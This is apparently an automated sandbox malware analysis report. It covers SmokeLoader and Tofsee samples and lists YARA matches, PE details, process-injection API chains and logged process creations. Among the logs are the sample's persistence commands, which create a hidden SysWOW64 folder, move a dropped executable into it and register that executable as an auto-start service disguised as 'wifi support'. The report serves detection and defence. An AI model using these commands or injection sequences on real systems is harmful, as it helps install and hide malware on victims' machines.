                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49938 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
                      Source: 9460.exe, 00000010.00000002.437004184.000000000068A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Tofsee
                      Source: Yara matchFile source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR

                      System Summary:

                      PE file has nameless sections
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042A1A0
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00424B10
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042AF80
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_005731FF
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00573253
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402A5F
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402AB3
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402A5F
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0048160C
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004815DE
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004815F6
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C3253
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C31FF
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0042B2A0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0042A4C0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00424E30
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_052896F0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05280462
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05280470
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E1810
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E53F8
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E0448
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E2E48
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053FAD68
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053FA430
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F2C88
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F4758
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F67B8
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F08B0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F53E0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F7249
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F90D3
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3657.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 50E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection loaded: mscorjit.dll
                      Source: ZA3cYU28Yl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\969F.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: String function: 00422880 appears 133 times
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: String function: 0041E000 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 006C2794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 0041E300 appears 32 times
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 293.exe.10.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 9460.exe.10.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 48E7.exe.10.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 41A3.exe.10.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7F9A.exe.10.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 8ECE.exe.10.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 41A3.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 41A3.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 41A3.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 41A3.exe.10.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: 50E7.exe.10.dr | Static PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 7F9A.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7F9A.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7F9A.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7F9A.exe.10.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: 8ECE.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 8ECE.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 8ECE.exe.10.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 8ECE.exe.10.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: ZA3cYU28Yl.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\rcvfbte
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@47/28@87/12
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Process created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Roaming\rcvfbte | Process created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9460.exe C:\Users\user\AppData\Local\Temp\9460.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Process created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9779.exe C:\Users\user\AppData\Local\Temp\9779.exe
                      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A881.exe C:\Users\user\AppData\Local\Temp\A881.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
